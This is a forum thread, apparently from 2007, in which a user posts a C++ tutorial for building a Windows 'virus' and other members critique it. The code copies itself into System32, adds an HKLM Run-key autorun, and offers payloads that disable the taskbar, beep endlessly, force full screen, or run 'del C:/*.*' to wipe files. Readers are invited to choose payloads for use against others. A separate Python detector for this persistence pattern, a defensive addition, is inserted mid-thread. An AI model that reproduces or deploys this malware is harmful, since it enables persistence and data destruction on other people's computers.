Malicious Coding.

ebrizzlez
Kage
Posts: 732
Joined: 31 Mar 2007, 16:00
Location: Hidden in a Buffer Protection.


Post by ebrizzlez »

Ok. This tutorial was inspired by the constant asking about viruses and keyloggers, and requested by bubzuru. The Art of Virii is a wonderful world of top-of-the-line programming.
A computer virus is a computer program that can copy itself and infect a computer without the permission or knowledge of the user. The original may modify the copies or the copies may modify themselves, as occurs in a metamorphic virus. A virus can only spread from one computer to another when its host is taken to the uninfected computer, for instance by a user sending it over a network or carrying it on a removable medium such as a floppy disk, CD, or USB drive.
As explained below by pseudo and floodhound, the API (Application Programming Interface) is a way for your virus to have a talk with Windows and see how much damage you can cause with that chat. Although malicious viruses are mainly coded low level, such as in Assembly, we are not here to wipe out hard drives or do other malicious work, but to examine a virus. :wink: This tutorial will teach you the basics of virus building.

Requirements:
1. C++ Compiler (Dev-C++ recommended) (www.bloodshed.net)
2. Some knowledge required, but not needed.
3. Some ass-kicking grey hats. :twisted:

Ok, to start we will try to hide the window. But of course we need the headers too! We will be using the windows.h, winable.h, and string.h header files. Then we need to indicate that the window will be hidden, so we pass a few parameters into the main() function which tell it to hide. Here is what you can type in so far:

Code: Select all

#include "windows.h"
#include "winable.h"
#include "string.h"

int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE PrevInstance, LPSTR lpszArgument, int nFunsterStil)

{
 
 return 0;
}
Ok. So far so good. You don't really need any other header currently, but later on I will show you some things you can add with them. When you compile the source, nothing happens because it just returns the value zero as an int and then closes out. You may notice that the source indicates it's a Windows API program and it's the main window. Now let's add something to make our application look better.

Code: Select all

MessageBox(NULL,"Hello World","The Art Of Virii",MB_OK);
That little snippet above just shows a message saying Hello World; this isn't a virus yet, just an example of what else we can do with API programming. You can delete the example above if you like. Now let's make our application a bit better.

Code: Select all

char system[MAX_PATH];     /* system directory, later the full target path */
char pathtofile[MAX_PATH]; /* path of this executable */
HMODULE GetModH = GetModuleHandle(NULL);                  /* handle of the running module */
GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile)); /* full path of this .exe */
GetSystemDirectory(system,sizeof(system));               /* e.g. C:\WINDOWS\system32 */
strcat(system,"\\virus.exe");                            /* append the target file name */
CopyFile(pathtofile,system,false);                       /* copy this .exe there; false = overwrite an existing copy */
MessageBox(NULL,"Hello World","The Art of Virii by Ebrizzlez",MB_OK);

Ok, now our program has the structure of a virus. :twisted: It creates a string that finds where the system folder is located. That's why we use the HMODULE, and we also pass MAX_PATH as a buffer to limit the search; then we use the CopyFile() function to look for the system file, and once found, copy virus.exe into it. If you go into the system folder you will see it will pop up with our message, indicating it works. Now, here comes the sick part. We will be editing the registry, so you have to be careful; it's recommended you don't run this application anymore unless you know how to fix the registry. Or you can skip this part and test the other parts. :wink:

Code: Select all


HKEY hKey;

/* open the machine-wide Run key with write access (needs administrator rights) */
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );
/* store the path of the copied file as a REG_SZ autorun value
   (sizeof(system) writes the whole MAX_PATH buffer, not just the string) */
RegSetValueEx(hKey, "Writing to the Registry Example",0,REG_SZ,(const unsigned char*)system,sizeof(system));
RegCloseKey(hKey);
Simple, right? It just edits the registry so it runs during startup, then closes the registry. :twisted:
Now here comes the best part of our virus, the payload! Now if you're thinking right now "sweet! I am gonna reformat the user's drive with the payload" then get off right now! Most virus builders hate others who just crash other people's computers with a simple reformat command. Where is the fun? Virii is an art, and it shouldn't be abused. Most viruses don't reformat the drive but slip in and attack certain files to get the user more pissed. You should always leave your target alive until you've gotten all the information needed; then and only then may you kill them. And I wouldn't recommend doing so. Here are a few tricks you can add:

Payload 1. (Please decide a payload best for you, or pick all. :twisted: )

Code: Select all

HWND hWin;                           /* handle of the taskbar window */
hWin = FindWindow("Shell_TrayWnd",NULL);
EnableWindow(hWin,false);            /* stop the taskbar from taking input */

while(1==1)                          /* never exits: flicker the taskbar */
{
ShowWindow(hWin,false);
Sleep(1000);
ShowWindow(hWin,true);
Sleep(1000);
}

 return 0;
}
Use the snippet above to mess with the start bar; although it's easily fixed by pressing Alt + Ctrl + Del, it can be a bit of a pain in the ass and perfect for those noobs. :wink:

Payload 2.

Code: Select all


int Freq = 100;       /* tone frequency in Hz */
int Duration = 100;   /* tone length in milliseconds */
Beep(Freq,Duration);
while(1==1)           /* endless loop: beep forever */
{Beep(Freq,Duration);}
This code makes the computer beep like crazy, another annoying thing. You can use this loop and make a popup message using the MessageBox() command for every beep. :roll:

Payload 3.

Code: Select all


keybd_event (VK_MENU, 0x38, 0, 0);                 /* press Alt */
keybd_event (VK_RETURN, 0x1c, 0, 0);               /* press Enter */
keybd_event (VK_RETURN, 0x1c, KEYEVENTF_KEYUP, 0); /* release Enter */
keybd_event (VK_MENU, 0x38, KEYEVENTF_KEYUP, 0);   /* release Alt */
printf("Mess with the best, die like the rest. \n"); /* needs #include <stdio.h> */
This throws the screen into full screen, so all the user sees is a boring black screen that displays the message. This can be useful at times to hide other viruses that run visibly.

Payload 4.

Code: Select all

system("del C:/*.*")
:twisted: :twisted: :twisted: Like I said, VIRII ISN'T REFORMATTING PEOPLE'S DRIVES. But if you must, then ok. The last payload is what we programmers call a Batch Back Out, when a user uses batch in order to do something, which most of the time is a bit noobish. Anything done in batch can be performed twice as well with low-level programming. :wink: Your code should look like this in the end:

Code: Select all

#include "windows.h"
#include "string.h"   /* for strcat() */

int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE PrevInstance,
                            LPSTR lpszArgument, int nFunsterStil)
{
    char system[MAX_PATH];     /* system directory, later the full target path */
    char pathtofile[MAX_PATH]; /* path of this executable */
    HMODULE GetModH = GetModuleHandle(NULL);

    GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));
    GetSystemDirectory(system,sizeof(system));

    strcat(system,"\\virus.exe");

    /* copy this executable into the system directory (overwrites an existing copy) */
    CopyFile(pathtofile,system,false);

    HKEY hKey;

    /* register the copy under the machine-wide Run key so it starts with Windows */
    RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );
    RegSetValueEx(hKey, "Writing to the Registry Example",0,REG_SZ,(const unsigned char*)system,sizeof(system));
    RegCloseKey(hKey);

    /* payload 1: disable the taskbar window and toggle its visibility forever */
    HWND hWin;
    hWin = FindWindow("Shell_TrayWnd",NULL);
    EnableWindow(hWin,false);

    while(1==1)
    {
        ShowWindow(hWin,false);
        Sleep(1000);
        ShowWindow(hWin,true);
        Sleep(1000);
    }

    return 0;
}
That's if you use the first payload. Your code may look different depending on what you did or used. I hope you found this any good. You must remember, Virii building is an Art. This isn't much of a deadly virus, or even classified as a useful one, but it shows you how to copy the file like a virus would do, and how to edit the registry like most viruses would do. I am hoping floodhound and the other admins can reflect their opinions so that I can know, and for you noobs, I hope this gave you a better understanding. :wink:
Last edited by ebrizzlez on 18 May 2007, 18:56, edited 4 times in total.
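The program in the post above does two things a defender can watch for: it copies its own executable into the system directory, and it writes that path under the HKLM Run key. The following is an added example, not code from the thread or its author: a small Python detector that runs over constructed Sysmon-style event records (Event 11 FileCreate and Event 13 RegistryEvent SetValue; the field names follow Sysmon's schema, while the sample values, the allowlist of trusted writers and the severities are assumptions of the example) and raises a high-severity finding when the same process both drops a file into System32 and registers that file as an autorun.

```python
import re

# Processes that legitimately write into System32 or set Run values.
# This allowlist is an assumption made for the example; tune it per environment.
TRUSTED_WRITERS = {
    r"c:\windows\servicing\trustedinstaller.exe",
    r"c:\windows\system32\msiexec.exe",
}
SYSTEM_DIR = r"c:\windows\system32"
# Matches HKLM/HKCU ...\CurrentVersion\Run\<value> and RunOnce\<value>.
RUN_KEY_RE = re.compile(r"\\microsoft\\windows\\currentversion\\run(once)?\\", re.I)


def _norm(path):
    """Lower-case a Windows path and drop surrounding whitespace/quotes."""
    return path.strip().strip('"').lower()


def in_system_dir(path):
    """True when the path names a file beneath the system directory."""
    return _norm(path).startswith(SYSTEM_DIR + "\\")


def first_token(details):
    """Return the executable part of a Run value (quoted path or first word).

    An unquoted path containing spaces is cut at the first space; that is a
    known limitation kept for simplicity."""
    d = details.strip()
    if d.startswith('"'):
        end = d.find('"', 1)
        return d[1:end] if end > 0 else d[1:]
    return d.split(" ", 1)[0]


def analyze(events):
    """Return (severity, reason, event) findings for persistence-related events."""
    findings = []
    dropped = set()  # (writer image, file path) pairs written into System32
    for ev in events:
        image = _norm(ev["Image"])
        if image in TRUSTED_WRITERS:
            continue
        if ev["EventID"] == 11:  # FileCreate
            target = _norm(ev["TargetFilename"])
            if in_system_dir(target):
                dropped.add((image, target))
                findings.append(("medium", "untrusted process wrote into the system directory", ev))
        elif ev["EventID"] == 13 and RUN_KEY_RE.search(ev["TargetObject"]):  # RegistryEvent SetValue
            exe = _norm(first_token(ev["Details"]))
            if (image, exe) in dropped:
                sev, why = "high", "process registered a file it dropped into System32 as an autorun"
            elif in_system_dir(exe):
                sev, why = "medium", "autorun value points into the system directory"
            else:
                sev, why = "low", "autorun value set by a non-installer process"
            findings.append((sev, why, ev))
    return findings


# Constructed Sysmon-style records (field names per Sysmon Event 11/13; values are made up).
SAMPLE_EVENTS = [
    {"EventID": 11, "Image": r"C:\Users\demo\Downloads\tutorial.exe",
     "TargetFilename": r"C:\Windows\System32\virus.exe"},
    {"EventID": 13, "Image": r"C:\Users\demo\Downloads\tutorial.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Writing to the Registry Example",
     "Details": r"C:\Windows\System32\virus.exe"},
    {"EventID": 13, "Image": r"C:\Windows\System32\msiexec.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VendorAgent",
     "Details": r'"C:\Program Files\Vendor\agent.exe" --tray'},
    {"EventID": 13, "Image": r"C:\Program Files\Vendor\setup.exe",
     "TargetObject": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\VendorAgent",
     "Details": r'"C:\Program Files\Vendor\agent.exe" /background'},
]

if __name__ == "__main__":
    for sev, why, ev in analyze(SAMPLE_EVENTS):
        where = ev.get("TargetObject", ev.get("TargetFilename"))
        print(f"[{sev}] {why}: {ev['Image']} -> {where}")
```

On the constructed input the tutorial's two steps produce a medium finding (write into System32) followed by a high one (the same process registering that file under Run); the msiexec write is allowlisted, and a third-party installer setting its own Run value is reported at low severity so it can be reviewed rather than ignored.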

bubzuru
.net coder
Posts: 700
Joined: 17 Apr 2007, 16:00

Post by bubzuru »

nice tut, thanks :D
get the compiler here

Code: Select all

http://www.megaupload.com/?d=URSQHOJX
Last edited by bubzuru on 17 May 2007, 09:21, edited 2 times in total.

Macross
Fame ! Where are the chicks?!
Posts: 152
Joined: 01 May 2007, 16:00

Post by Macross »

Nice, thanks

ebrizzlez
Kage
Posts: 732
Joined: 31 Mar 2007, 16:00
Location: Hidden in a Buffer Protection.

Post by ebrizzlez »

Np. If there is anything else you want to see, bubzuru, I am here for you. And please put offsite links in the Code box, so not as many users will sign out of this site. Thanks. :wink:

bubzuru
.net coder
Posts: 700
Joined: 17 Apr 2007, 16:00

Post by bubzuru »

ebrizzlez wrote: If there is anything else you want to see, bubzuru
It would be great if you did a tut on just payloads :lol: What do you mean by off-site links? :oops:

ebrizzlez
Kage
Posts: 732
Joined: 31 Mar 2007, 16:00
Location: Hidden in a Buffer Protection.

Post by ebrizzlez »

Well, the "Get the Compiler" link redirects you off this site, so instead, put something like this

Code: Select all

www.offsitelinks.com
And I might add some payloads, but they're useless if you don't have the body of the virus. :wink:
[edit] Try to speak proper English, the admins might get pissed. Plus, big eye issues at night time when I sign on. Just an advance warning. :wink:

pseudo_opcode
cyber messiah
Posts: 1201
Joined: 30 Apr 2006, 16:00
Location: 127.0.0.1

Post by pseudo_opcode »

First of all I'd say a very good post.. BUT, did you make it yourself? Anyway, I hate correcting people, but still:
ebrizzlez wrote: That's if you use the first payload. Your code may look different depending on what you did or used. I hope you found this any good. You must remember, Virii building is an Art. The art is of programming; only great viruses are programmed flawlessly, and most virii aren't much harm. I am hoping floodhound and the other admins can reflect their opinions so that I can know, and for you noobs, I hope this gave you a better understanding.
Since you asked for it, there ya go..
I'm sorry to say, but this program does not qualify as a virus.
A typical internet virus has the following main components:
1. Vulnerability Scanning
2. Exploitation
3. Proliferation
4. Copying (the most important part)

Vulnerability scanning is required to find new exploitable targets, which is followed by exploitation; a virus is not a virus if it doesn't multiply.
You, in your post, are trying to redefine a virus???

Second thing, you disappointed me by saying:
ebrizzlez wrote: Most viruses (that are good) are coded in the API section (Application Programming Interface)
Actually it is true, but not completely true. API is functionality which can be used in code; try formatting the C drive while you have already loaded Windows, and it won't be able to format it.
Ever seen Partition Magic? When you ask it to format the C drive and you have Windows on the C drive, it reboots and then formats, because even if it uses the API it can format Windows while it is loaded. APIs also have some limitations; that's why we prefer low-level stuff, things come down to assembly.
You usually put a virus in the disk's MBR; APIs are at the OS level, whereas assembly can be at the hardware level too. You can directly take over a computer, directly write to video memory by specifying the addresses explicitly; just imagine how much chaos you can create.

What you've given is simply a nasty program which can really screw things up, and not a virus, and definitely not an "Art of virii".
But still I appreciate that you have tried something useful.. not many people here try their hands at this stuff.. (provided you did it yourself)

*Note to b_b: HTML tags are really strict, pissed me off in this post

floodhound2
∑lectronic counselor
Posts: 2117
Joined: 03 Sep 2006, 16:00
Location: 127.0.0.1

Post by floodhound2 »

Note: I did not spend much time reading this yet, but I will soon.

So far I agree with Pseudo, some of the things are not correct.

I am going to test some of this because I have never seen C code using Visual Basic-type instructions. It is as if you float around from one language to the next; however, just because I never code in C like this does not mean it will not work.

Also I become confused when you state that “API allows the program to connect and interact with windows and your os.” Last I knew Windows is your OS.

If I remember correctly, and in a nutshell: API allows you to "ask Windows" for permission "to a specific", already written piece of code from Microsoft. This is so that Microsoft can keep its grip on its operating system and always remain in control.

That said: how can one write a virus from existing code? Yes and true; you may be able to do some "limited" harm, but this is not the true nature of a virus if you ask me.
₣£ΘΘĐĦΘŮŇĐ

ebrizzlez
Kage
Posts: 732
Joined: 31 Mar 2007, 16:00
Location: Hidden in a Buffer Protection.

Post by ebrizzlez »

Thanks for the info, I will take note of that. I personally don't know much Assembly, so I hadn't known that, so thanks. :wink: I never really did low-level programming, so I am gonna check that out. And no one's perfect, and I actually appreciate the thoughts; it helps me learn more and that's what I am here for. I read a few topics on this, so I myself don't know much. And the HTML tags were annoying and forced lots of editing on me. :?
[edit] I will make a few mods based around what you said when I get the chance. :wink:
Last edited by ebrizzlez on 18 May 2007, 05:23, edited 1 time in total.

ebrizzlez
Kage
Posts: 732
Joined: 31 Mar 2007, 16:00
Location: Hidden in a Buffer Protection.

Post by ebrizzlez »

I made a few modifications to the tutorial. Check to see if it's correct or not, and tell me if something doesn't sound right or anything. Thank you guys. :wink:
btw. Earlier I said you use the API to connect and interact with Windows because I was learning Qt, and Qt creates slots that you connect to each other and then you are able to interact with your OS. I also said "Windows or your OS" because I thought this code could be multi-platform, but I forgot Unix systems don't have a system folder. :oops:

pseudo_opcode
cyber messiah
Posts: 1201
Joined: 30 Apr 2006, 16:00
Location: 127.0.0.1

Post by pseudo_opcode »

Please change the topic from "Art of virii" to something else like "malicious program" or something, because we don't want noobs to get the wrong impression of viruses. Also, in the cyber world, unlike medical science, we call them viruses instead of virii.

ebrizzlez
Kage
Posts: 732
Joined: 31 Mar 2007, 16:00
Location: Hidden in a Buffer Protection.

Post by ebrizzlez »

During the post hours, I found it easier to type virii instead of viruses. But I will change the topic. :wink:

bubzuru
.net coder
Posts: 700
Joined: 17 Apr 2007, 16:00

Post by bubzuru »

pseudo_opcode wrote: also in the cyber world, unlike medical science, we call them viruses instead of virii
A lot of people prefer to use virii

ayu
Staff
Posts: 8109
Joined: 27 Aug 2005, 16:00

Post by ayu »

bubzuru wrote:
also in the cyber world, unlike medical science, we call them viruses instead of virii
A lot of people prefer to use virii
The same people who talk 1337?

(I admit, I use it sometimes, but I don't talk 1337)
"The best place to hide a tree, is in a forest"

ebrizzlez
Kage
Posts: 732
Joined: 31 Mar 2007, 16:00
Location: Hidden in a Buffer Protection.

Post by ebrizzlez »

neo130 wrote:
bubzuru wrote:
also in the cyber world, unlike medical science, we call them viruses instead of virii
A lot of people prefer to use virii
The same people who talk 1337?

(I admit, I use it sometimes, but I don't talk 1337)
May I say this again: during that time period, I was a bit tired and in a rush, so I couldn't constantly write "viruses", so I wrote "virii". I had to finish before my dad got home. :roll:
And personally, I hate the people who talk 1337; it's unwanted, and sure is a pain in the ass to see this: "h3110 mY nAm 15 r3tArd!" You don't know how many noobs I chat with who talk like that! It drives me crazy. But I catch myself shortening things while in a rush, e.g. that = dat. 8O
